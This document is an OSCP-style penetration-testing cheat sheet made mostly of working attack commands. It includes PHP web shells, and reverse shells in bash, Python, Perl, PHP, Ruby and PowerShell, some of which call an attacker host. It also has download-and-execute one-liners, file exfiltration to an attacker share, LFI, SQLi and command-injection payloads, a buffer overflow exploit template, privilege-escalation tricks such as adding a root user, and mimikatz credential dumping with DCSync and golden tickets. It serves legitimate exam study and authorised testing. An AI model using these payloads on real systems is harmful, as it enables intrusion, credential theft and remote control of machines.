OSCP Cheat Sheet

# Quick port discovery
nmap -p- --min-rate 5000 -T4 <IP> -oN ports.txt

# Full scan on discovered ports
nmap -p 22,80,443 -sV -sC -oA full <IP>

# All in one aggressive
nmap -A -p- <IP> -oA allports

# UDP (top 20)
nmap -sU --top-ports 20 <IP>

# Specific scripts
nmap -p 445 --script smb-vuln* <IP>
nmap -p 80 --script http-enum,http-headers <IP>
nmap --script vuln <IP>

# Ping sweep
nmap -sn 192.168.1.0/24

# No ping (common for firewalled hosts)
nmap -Pn -p- --min-rate 5000 <IP>

# Save all formats
nmap -sV -sC -p- -oA scan_<IP> <IP>

# Fast port scan, pass to nmap
rustscan -a <IP> -- -sV -sC
rustscan -a <IP> -r 1-65535 -- -A
rustscan -a <IP> --ulimit 5000 -- -sV -sC

autorecon <IP>
autorecon <IP> --only-scans-dir
autorecon 192.168.1.0/24  # subnet

netdiscover -r 192.168.1.0/24
arp-scan -l
fping -a -g 192.168.1.0/24 2>/dev/null
for i in $(seq 1 254); do ping -c1 -W1 192.168.1.$i & done | grep "64 bytes"

# Directory / file bruteforce
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak -t 50 -o gobuster.txt
feroxbuster -u http://<IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html --depth 3
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<IP>/FUZZ -mc 200,301,302,403

# Virtual host / subdomain fuzzing
gobuster vhost -u http://<IP> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<IP> -H "Host: FUZZ.domain.htb" -mc 200

# Nikto
nikto -h http://<IP>

# curl
curl -v http://<IP>
curl -I http://<IP>                  # headers only
curl -s http://<IP>/robots.txt
curl -k https://<IP>               # ignore SSL

# Enumeration
enum4linux -a <IP>
enum4linux-ng -A <IP>
nmap -p 445 --script smb-enum-shares,smb-enum-users,smb-os-discovery <IP>
smbmap -H <IP>
smbmap -H <IP> -u 'user' -p 'pass'
crackmapexec smb <IP>
crackmapexec smb <IP> -u user -p pass --shares

# List shares (null session)
smbclient -L //<IP> -N

# Connect to share
smbclient //<IP>/share -N
smbclient //<IP>/share -U user

# Common smbclient commands
#   ls, cd, pwd, get <file>, put <file>, mget *, recurse ON, prompt OFF

# Mount share
mount -t cifs //<IP>/share /mnt/smb -o username=user,password=pass

ftp <IP>
# Try: anonymous / anonymous  OR  anonymous / (blank)
nmap -p 21 --script ftp-anon,ftp-bounce,ftp-syst <IP>

# Binary mode for exe/zip transfers:
#   ftp> binary
#   ftp> get file.exe

ssh user@<IP>
ssh user@<IP> -i id_rsa
ssh user@<IP> -p 2222
# Bypass host key check
ssh -o StrictHostKeyChecking=no user@<IP>
# Generate key pair
ssh-keygen -t rsa -b 4096 -f id_rsa
# Fix permissions on private key
chmod 600 id_rsa

# Community string brute force
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP>

# Walk MIB tree
snmpwalk -c public -v1 <IP>
snmpwalk -c public -v2c <IP>
snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25   # users
snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2  # processes

snmp-check <IP>

# Null / anonymous bind
ldapsearch -x -H ldap://<IP> -b "dc=domain,dc=com"
ldapsearch -x -H ldap://<IP> -b "" -s base

# Authenticated
ldapsearch -x -H ldap://<IP> -b "dc=domain,dc=com" -D "user@domain.com" -w password

# Domain dump
ldapdomaindump -u 'domain\user' -p 'pass' <IP>
ldapdomaindump -u 'domain\user' -p 'pass' <IP> -o /tmp/ldd

showmount -e <IP>
mount -t nfs <IP>:/share /mnt/nfs -nolock
mount -t nfs -o vers=2 <IP>:/share /mnt/nfs  # force v2
# Check /etc/exports for no_root_squash (see Linux PrivEsc)

xfreerdp /u:user /p:pass /v:<IP>
xfreerdp /u:user /p:pass /v:<IP> /drive:share,/tmp  # mount local dir
xfreerdp /u:user /p:'' /v:<IP> +clipboard
rdesktop <IP> -u user -p pass

mysql -u root -p -h <IP>
mysql -u root --password='' -h <IP>

# Useful SQL commands:
# show databases;   use <db>;   show tables;   select * from <table>;   describe <table>;

# Read files via SQLi
# SELECT LOAD_FILE('/etc/passwd');
# SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

impacket-mssqlclient user:pass@<IP>
impacket-mssqlclient domain/user:pass@<IP> -windows-auth
sqsh -S <IP> -U user -P pass
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell <IP>

# Enable xp_cmdshell (in mssqlclient)
# EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
# EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
# EXEC xp_cmdshell 'whoami';

evil-winrm -i <IP> -u user -p pass
evil-winrm -i <IP> -u user -H NTLMHASH
evil-winrm -i <IP> -u user -p pass -S  # HTTPS
crackmapexec winrm <IP> -u user -p pass

nmap -p 25 --script smtp-commands,smtp-enum-users <IP>
telnet <IP> 25
# VRFY user  (user enumeration)
# EXPN list  (mailing list expansion)
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t <IP>

# Basic
http://<IP>/page.php?file=/etc/passwd
http://<IP>/page.php?file=../../../../etc/passwd
http://<IP>/page.php?file=....//....//....//etc/passwd  # bypass filter
http://<IP>/page.php?file=%2fetc%2fpasswd              # URL encoded

# PHP filter (read source)
http://<IP>/page.php?file=php://filter/convert.base64-encode/resource=index.php

# RCE via data:// wrapper
http://<IP>/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
# (the base64 is: <?php system($_GET['cmd']); ?>)

# Log poisoning → RCE
curl -A "<?php system(\$_GET['cmd']); ?>" http://<IP>/
http://<IP>/page.php?file=/var/log/apache2/access.log&cmd=whoami
# Other log locations: /var/log/nginx/access.log, /var/log/auth.log
# Also try: /proc/self/environ, /var/mail/www-data

# Windows
http://<IP>/page.php?file=C:\Windows\win.ini
http://<IP>/page.php?file=..\..\..\..\windows\win.ini

# Test strings
'
''
' OR '1'='1
' OR 1=1--
" OR 1=1--
admin'--
admin' #
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

# Determine number of columns
' ORDER BY 1--    ' ORDER BY 2--    ' ORDER BY 3-- ...  # until error

# SQLMap
sqlmap -u "http://<IP>/page.php?id=1" --dbs
sqlmap -u "http://<IP>/page.php?id=1" -D database --tables
sqlmap -u "http://<IP>/page.php?id=1" -D database -T users --dump
sqlmap -u "http://<IP>/page.php?id=1" --os-shell
sqlmap -u "http://<IP>/login.php" --data="user=admin&pass=test" --dbs
sqlmap -u "http://<IP>/page.php?id=1" --level=5 --risk=3
# Crawl and test
sqlmap -u "http://<IP>/" --crawl=2 --dbs

# Extension tricks
shell.php  →  shell.php5  shell.phtml  shell.pHp  shell.PhP

# Double extension
shell.jpg.php    shell.php.jpg  (depends on config)

# Null byte (old PHP < 5.3)
shell.php%00.jpg

# Change Content-Type header to:
image/jpeg    image/gif    image/png

# Add magic bytes to start of PHP file
GIF89a;
<?php system($_GET['cmd']); ?>

# .htaccess upload (if Apache)
# Content: AddType application/x-httpd-php .jpg

# Web shell one-liners
<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>

# Injection characters
;whoami
|whoami
||whoami
&whoami
&&whoami
`whoami`
$(whoami)
%0awhoami         # newline

# Blind (time-based)
; sleep 5
| ping -c 5 127.0.0.1

# Blind (OOB)
; curl http://<attacker>/$(whoami)
; nslookup $(whoami).<attacker>

wpscan --url http://<IP> --enumerate ap,at,u
wpscan --url http://<IP> -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://<IP> --api-token <token>  # for vuln detection

# Default paths
# /wp-admin  /wp-login.php  /wp-config.php  /xmlrpc.php

# Malicious plugin (if admin access)
# Appearance → Theme Editor → 404.php → add shell

nc -lvnp 4444
rlwrap nc -lvnp 4444
socat file:`tty`,raw,echo=0 tcp-listen:4444

# Bash
bash -i >& /dev/tcp/<IP>/4444 0>&1
bash -c 'bash -i >& /dev/tcp/<IP>/4444 0>&1'

# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<IP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Python 2
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("<IP>",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Netcat (with -e)
nc -e /bin/sh <IP> 4444

# Netcat (without -e / mkfifo)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> 4444 >/tmp/f

# Perl
perl -e 'use Socket;$i="<IP>";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# PHP (one-liner)
php -r '$sock=fsockopen("<IP>",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
ruby -rsocket -e 'f=TCPSocket.open("<IP>",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# PowerShell TCP reverse shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

# Base64 encoded PowerShell (bypass)
powershell -enc <BASE64>

# PowerShell one-liner download and execute
IEX (New-Object Net.WebClient).DownloadString('http://<IP>:8000/shell.ps1')

<?php system($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
<?php echo `$_GET['cmd']`; ?>

# Step 1: spawn PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/bash")'
script /dev/null -c bash
/usr/bin/script -qc /bin/bash /dev/null

# Step 2: background the shell
Ctrl+Z

# Step 3: fix terminal
stty raw -echo; fg

# Step 4: fix environment
reset
export SHELL=bash
export TERM=xterm-256color
stty rows 50 cols 200

# Alternative: socat (requires socat on target)
# Attacker:
socat file:`tty`,raw,echo=0 tcp-listen:4444
# Target:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP>:4444

# Linux
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f elf -o shell.elf
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f elf -o shell.elf

# Windows
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o shell32.exe

# Windows DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f dll -o shell.dll

# Web shells
msfvenom -p php/reverse_php LHOST=<IP> LPORT=4444 -f raw -o shell.php
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f aspx -o shell.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f raw -o shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war -o shell.war

# With bad char exclusion
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 -b "\x00\x0a\x0d" EXITFUNC=thread -f c

# List payloads
msfvenom -l payloads | grep shell_reverse
msfvenom -l payloads | grep meterpreter

# Python HTTP server
python3 -m http.server 8000
python -m SimpleHTTPServer 8000

# Python HTTPS server
python3 -c "import http.server,ssl;s=http.server.HTTPServer(('',8443),http.server.SimpleHTTPRequestHandler);s.socket=ssl.wrap_socket(s.socket,certfile='/tmp/cert.pem',server_side=True);s.serve_forever()"

# SMB share (impacket)
impacket-smbserver share . -smb2support
impacket-smbserver share . -smb2support -username user -password pass

# FTP server
python3 -m pyftpdlib -p 21 -w

# Receive files (upload server)
pip install uploadserver
python3 -m uploadserver

wget http://<IP>:8000/file.sh -O /tmp/file.sh
curl http://<IP>:8000/file.sh -o /tmp/file.sh
curl http://<IP>:8000/file.sh | bash

# Netcat
nc -lvnp 4444 < file.sh          # attacker
nc <IP> 4444 > file.sh           # target

# Base64 transfer (no network restrictions)
# Attacker:
base64 -w 0 file.sh; echo
# Target:
echo "<BASE64>" | base64 -d > file.sh

# SCP
scp file.sh user@<target>:/tmp/
scp user@<target>:/tmp/file.sh .

# PowerShell (various methods)
iwr http://<IP>:8000/file.exe -outfile C:\Windows\Temp\file.exe
Invoke-WebRequest -Uri http://<IP>:8000/file.exe -OutFile C:\Windows\Temp\file.exe
(New-Object System.Net.WebClient).DownloadFile('http://<IP>:8000/file.exe','C:\Windows\Temp\file.exe')

# Execute in memory (no disk)
IEX (New-Object Net.WebClient).DownloadString('http://<IP>:8000/shell.ps1')

# certutil
certutil.exe -urlcache -split -f http://<IP>:8000/file.exe C:\Windows\Temp\file.exe

# bitsadmin
bitsadmin /transfer job http://<IP>:8000/file.exe C:\Windows\Temp\file.exe

# SMB copy (after attacker starts smbserver)
copy \\<attacker>\share\file.exe .
net use Z: \\<attacker>\share; copy Z:\file.exe .

# curl (Windows 10+)
curl http://<IP>:8000/file.exe -o C:\Windows\Temp\file.exe

# FTP (batch script)
echo open <IP> 21 > ftp.txt && echo user anonymous >> ftp.txt && echo binary >> ftp.txt && echo get file.exe >> ftp.txt && ftp -v -n -s:ftp.txt

# To attacker's SMB share
copy C:\Users\user\Desktop\proof.txt \\<attacker>\share\

# PowerShell upload
$b = [System.IO.File]::ReadAllBytes("C:\file.txt"); $e = [System.Convert]::ToBase64String($b); Invoke-WebRequest http://<IP>:8000/upload -Method POST -Body $e

# Netcat
nc.exe <IP> 4444 < file.txt      # target sends
nc -lvnp 4444 > file.txt         # attacker receives

hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --show   # show cracked

# Identify hash type
hashcat --identify hash.txt
hash-identifier
haiti <hash>

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --format=NT hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --show hash.txt

# Convert to john format
ssh2john id_rsa > id_rsa.hash
zip2john file.zip > zip.hash
pdf2john file.pdf > pdf.hash
keepass2john keepass.kdbx > keepass.hash
gpg2john secret.gpg > gpg.hash

john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt

# SSH
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://<IP>
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://<IP> -t 4

# FTP
hydra -l user -P /usr/share/wordlists/rockyou.txt ftp://<IP>

# SMB
hydra -l user -P /usr/share/wordlists/rockyou.txt smb://<IP>

# RDP
hydra -l user -P /usr/share/wordlists/rockyou.txt rdp://<IP>

# HTTP POST form
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:Invalid credentials"

# HTTP Basic Auth
hydra -l admin -P /usr/share/wordlists/rockyou.txt <IP> http-get /admin/

# Options: -t 4 (threads), -V (verbose each attempt), -f (stop on first found), -s port

# Spray single password against user list
crackmapexec smb <IP>/24 -u users.txt -p 'Password123' --continue-on-success

# Test credentials
crackmapexec smb <IP> -u user -p pass
crackmapexec smb <IP> -u user -H NTLMHASH

# Dump SAM
crackmapexec smb <IP> -u admin -p pass --sam
crackmapexec smb <IP> -u admin -p pass --lsa

# Simple fuzzer template
import socket, time, sys

ip = "<TARGET_IP>"
port = 1337
prefix = "OVERFLOW1 "  # command prefix if needed

buffer = b"A" * 100
while True:
    try:
        s = socket.socket()
        s.connect((ip, port))
        s.recv(1024)
        s.send(bytes(prefix, "latin-1") + buffer + b"\r\n")
        s.recv(1024)
        s.close()
        print(f"Sent {len(buffer)} bytes")
        time.sleep(1)
        buffer += b"A" * 100
    except:
        print(f"Crashed at {len(buffer)} bytes")
        sys.exit()

# Note the crash length, add ~400 for safety

# Generate cyclic pattern (crash_length + 400)
msf-pattern_create -l 2400

# Or from metasploit:
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

# Send pattern as payload, note EIP value in Immunity, then:
msf-pattern_offset -l 2400 -q <EIP_VALUE>
# → Exact match at offset XXX

# payload = "A" * offset + "B" * 4 + "C" * (buffer_size - offset - 4)
# EIP in debugger should show 42424242
# Note ESP value and available space for shellcode

# Mona: generate bytearray excluding \x00
!mona bytearray -b "\x00"

# Send all bytes \x01–\xff after EIP control
# Compare memory dump vs bytearray.bin:
!mona compare -f C:\mona\bytearray.bin -a <ESP_ADDRESS>

# Repeat excluding found bad chars until "Unmodified"
!mona bytearray -b "\x00\x0a\x0d"

# List modules (look for no ASLR, no SafeSEH, no DEP)
!mona modules

# Find JMP ESP in clean module
!mona find -s "\xff\xe4" -m module.dll

# Verify opcode
msf-nasm_shell
nasm > jmp esp   # → FFE4

# Note address (e.g., 0x625011AF) - goes in EIP as little-endian
# struct.pack("<I", 0x625011AF)

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f python -v payload

import socket, struct

ip = "<TARGET_IP>"
port = 1337
prefix = "OVERFLOW1 "

offset = 1978                                   # your offset
eip = struct.pack("<I", 0x625011AF)            # JMP ESP address
nop_sled = b"\x90" * 16

payload = (                                    # paste msfvenom -f python output here
    b"\xdb\xc0..."
)

buffer = b"A" * offset + eip + nop_sled + payload

s = socket.socket()
s.connect((ip, port))
s.recv(1024)
print("Sending payload...")
s.send(bytes(prefix, "latin-1") + buffer + b"\r\n")
s.close()

# LinPEAS (most thorough)
curl -sL http://<attacker>:8000/linpeas.sh | bash
curl -sL http://<attacker>:8000/linpeas.sh | bash 2>&1 | tee /tmp/lp.txt

# LinEnum
./LinEnum.sh -t

# linux-smart-enumeration
./lse.sh -l2

id; whoami; hostname; uname -a; cat /etc/issue; cat /proc/version
cat /etc/passwd | grep -v nologin
cat /etc/shadow   # if readable → crack with john/hashcat
sudo -l           # check sudo rights
history; cat ~/.bash_history
env; cat /etc/environment
ls -la /home/     # other users' homes
ls -la /root/ 2>/dev/null

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
# Check results against: https://gtfobins.github.io/

sudo -l
sudo su -
sudo /bin/bash
sudo -u root /bin/bash
# Check GTFOBins for specific binaries
# e.g. sudo vim → :!/bin/bash
# e.g. sudo find . -exec /bin/sh \;
# e.g. sudo awk 'BEGIN {system("/bin/sh")}'

crontab -l
cat /etc/crontab
ls -la /etc/cron.*
ls -la /var/spool/cron/crontabs/

# Watch for new processes (pspy)
./pspy64   # download from github

# If cron runs writable script as root:
echo 'bash -i >& /dev/tcp/<IP>/4444 0>&1' >> /path/to/script.sh

getcap -r / 2>/dev/null

# cap_setuid+ep examples:
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
/usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'
/usr/bin/ruby -e 'Process::Sys.setuid(0); exec "/bin/bash"'

find / -writable -type f 2>/dev/null | grep -v proc | grep -v sys
find /etc -writable 2>/dev/null

# If /etc/passwd is writable → add root user
openssl passwd -1 -salt hacker password123
echo 'hacker:$1$hacker$HASH:0:0:root:/root:/bin/bash' >> /etc/passwd
su hacker

# Find SUID binary that calls commands without full path
strings /usr/local/bin/suid_binary | grep -v '/'

# Create malicious command in /tmp
echo '#!/bin/bash\nbash -i >& /dev/tcp/<IP>/4444 0>&1' > /tmp/service
chmod +x /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/suid_binary

# Target: check exports
cat /etc/exports
# Look for no_root_squash on a share

# Attacker: mount, create SUID bash
showmount -e <IP>
mount -t nfs <IP>:/share /mnt/nfs -nolock
cp /bin/bash /mnt/nfs/
chmod u+s /mnt/nfs/bash

# Target:
/share/bash -p

grep -r "password\|passwd\|secret\|PASS" /var/www/html/ 2>/dev/null
find / -name "config.php" -o -name ".env" -o -name "settings.py" 2>/dev/null | xargs grep -l "pass" 2>/dev/null
find / -name "*.conf" 2>/dev/null | xargs grep -l "password" 2>/dev/null
history | grep -i pass

# WinPEAS
.\winpeas.exe
.\winpeas.bat

# PowerUp (PowerSploit)
powershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"

# Seatbelt
.\Seatbelt.exe -group=all

# PrivescCheck
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"

whoami /all
systeminfo
hostname
net user
net user <username>
net localgroup administrators
ipconfig /all
route print
netstat -ano
tasklist /svc
wmic product get name,version    # installed software
wmic service list brief
reg query HKLM\SYSTEM\CurrentControlSet\Services

whoami /priv
# Look for: SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege

# PrintSpoofer (Windows 10 / Server 2019+)
.\PrintSpoofer.exe -i -c cmd.exe
.\PrintSpoofer.exe -c "nc.exe <IP> 4444 -e cmd"

# GodPotato (modern all-in-one)
.\GodPotato.exe -cmd "cmd /c whoami"
.\GodPotato.exe -cmd "nc.exe <IP> 4444 -e cmd.exe"

# JuicyPotato (Server 2008-2016, Windows 7-8)
.\JuicyPotato.exe -l 1337 -p cmd.exe -a "/c nc.exe <IP> 4444 -e cmd.exe" -t *

# SweetPotato
.\SweetPotato.exe -p cmd.exe -a "/c nc.exe <IP> 4444 -e cmd.exe"

# Find unquoted paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v '"'
sc qc <servicename>

# If path is: C:\Program Files\Service Folder\service.exe
# Place malicious exe at: C:\Program.exe  OR  C:\Program Files\Service.exe
# Then restart service:
sc stop <service>
sc start <service>
net stop <service> && net start <service>

# Check permissions
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -ucqv <servicename>

# If SERVICE_CHANGE_CONFIG: replace binary path
sc config <service> binpath= "C:\Windows\Temp\shell.exe"
sc stop <service>
sc start <service>

# Check registry (both must be 1)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Create malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f msi -o evil.msi
msiexec /quiet /qn /i evil.msi

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

# Check write permissions on autorun binary
.\accesschk.exe /accepteula -wvu "C:\path\to\autorun.exe"
# If writable, replace with malicious binary

cmdkey /list
runas /savecred /user:admin cmd.exe

# Registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"   # autologon

# Unattend files
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml
type C:\Windows\System32\sysprep\sysprep.xml

# Search for passwords
findstr /si password *.txt *.ini *.config *.xml *.ps1 *.bat

# Dump hashes (as admin/SYSTEM)
# Mimikatz:
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords
lsadump::sam

# Impacket
impacket-secretsdump <domain>/user:pass@<IP>
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# Use hash for auth
impacket-psexec -hashes :NTLM administrator@<IP>
evil-winrm -i <IP> -u administrator -H NTLMHASH
crackmapexec smb <IP> -u administrator -H NTLMHASH

# CrackMapExec
crackmapexec smb <IP> -u user -p pass --users
crackmapexec smb <IP> -u user -p pass --groups
crackmapexec smb <IP> -u user -p pass --shares
crackmapexec smb <DC> -u user -p pass --pass-pol

# PowerView
Import-Module .\PowerView.ps1
Get-Domain
Get-DomainController
Get-DomainUser | select samaccountname,description
Get-DomainGroup | select name
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainComputer | select dnshostname,operatingsystem
Find-LocalAdminAccess                    # which machines you're local admin on
Get-ObjectAcl -ResolveGUIDs | ? {$_.ActiveDirectoryRights -like "*Write*"}
Find-InterestingDomainAcl

# BloodHound collection
.\SharpHound.exe -c All --zipfilename bloodhound.zip
.\SharpHound.exe -c All,LoggedOn

# From Linux
bloodhound-python -u user -p pass -ns <DC_IP> -d domain.com -c all

# Start Neo4j, then BloodHound
sudo neo4j console
bloodhound &

# Default creds: neo4j:neo4j  (change on first login)
# Upload SharpHound zip via GUI

# Key queries (Analysis tab):
# - Find all Domain Admins
# - Shortest Paths to Domain Admins
# - Find Principals with DCSync Rights
# - Shortest Path from Owned Principals
# Mark owned nodes: right-click → Mark as Owned

# From Linux
impacket-GetUserSPNs domain.com/user:pass -dc-ip <DC_IP> -outputfile kerberoast.txt
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

# From Windows (PowerView)
Get-DomainUser -SPN | select samaccountname,serviceprincipalname
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File -Encoding ASCII kerberoast.txt

# No credentials needed if you have a user list
impacket-GetNPUsers domain.com/ -no-pass -usersfile users.txt -dc-ip <DC_IP> -outputfile asrep.txt

# With credentials
impacket-GetNPUsers domain.com/user:pass -dc-ip <DC_IP> -outputfile asrep.txt
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt

# Find AS-REP roastable users (PowerView)
Get-DomainUser -PreauthNotRequired | select samaccountname

# Pass-the-Hash (PTH)
impacket-psexec -hashes :NTLM administrator@<IP>
impacket-wmiexec -hashes :NTLM administrator@<IP>
crackmapexec smb <IP> -u admin -H NTLMHASH --exec-method smbexec

# Overpass-the-Hash (get TGT from NTLM)
mimikatz# sekurlsa::pth /user:admin /domain:domain.com /ntlm:HASH /run:cmd.exe

# Pass-the-Ticket
mimikatz# sekurlsa::tickets /export
mimikatz# kerberos::ptt [0;XXXX]-0-1-ticket.kirbi

# Linux PtT
export KRB5CCNAME=/path/to/ticket.ccache
impacket-psexec -k -no-pass domain.com/user@dc01.domain.com

# Dump all hashes via DRSUAPI
impacket-secretsdump domain.com/admin:pass@<DC_IP> -just-dc-ntlm
impacket-secretsdump domain.com/admin:pass@<DC_IP> -just-dc-user krbtgt

mimikatz# lsadump::dcsync /user:domain\krbtgt
mimikatz# lsadump::dcsync /all /csv

mimikatz.exe
privilege::debug
token::elevate

sekurlsa::logonpasswords       # dump all creds from LSASS
sekurlsa::wdigest              # plaintext if wdigest enabled
sekurlsa::tickets /export      # dump Kerberos tickets

lsadump::sam                   # dump SAM hashes
lsadump::lsa /patch            # dump LSA secrets
lsadump::dcsync /user:krbtgt   # DCSync attack

# Golden ticket (needs krbtgt hash + domain SID)
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:HASH /ptt

# Silver ticket (needs service hash)
kerberos::golden /user:user /domain:domain.com /sid:S-1-5-21-... /target:server /service:cifs /rc4:HASH /ptt

# GenericAll / GenericWrite on user → reset password
Set-DomainUserPassword -Identity victim -AccountPassword (ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force)

# WriteDACL on domain → grant DCSync rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=com" -PrincipalIdentity user -Rights DCSync

# GenericAll on group → add yourself
Add-DomainGroupMember -Identity "Domain Admins" -Members user

# WriteOwner → take ownership, then modify
Set-DomainObjectOwner -Identity victim -OwnerIdentity attacker
Add-DomainObjectAcl -TargetIdentity victim -PrincipalIdentity attacker -Rights All

# Local port forward: access remote service through attacker
# localhost:8080 → pivot:80 → internal:80
ssh -L 8080:<internal_IP>:80 user@<pivot_IP>
ssh -L 8080:127.0.0.1:80 user@<pivot_IP>   # pivot's localhost

# Remote port forward: expose attacker port through target
ssh -R 4444:127.0.0.1:4444 user@<pivot_IP>

# Dynamic SOCKS proxy (attacker creates SOCKS5 on 1080)
ssh -D 1080 user@<pivot_IP> -N -f
# Then proxychains uses socks5 127.0.0.1 1080

# Jump host
ssh -J user@jump_host target_user@<target_IP>

# Keep alive / no TTY
ssh -N -f user@<IP> -L 8080:127.0.0.1:80

# ── REVERSE SOCKS (most common) ──
# Attacker (server):
./chisel server -p 8000 --reverse

# Target (client):
./chisel client <attacker_IP>:8000 R:socks
# → SOCKS5 proxy on attacker at 127.0.0.1:1080

# ── REVERSE PORT FORWARD ──
./chisel client <attacker_IP>:8000 R:9090:<internal_IP>:80
# → attacker:9090 → internal:80

# ── FORWARD SOCKS (if you can reach target directly) ──
# Target:
./chisel server -p 8000 --socks5
# Attacker:
./chisel client <target_IP>:8000 socks

# Attacker: start proxy
sudo ip tuntap add user $USER mode tun ligolo
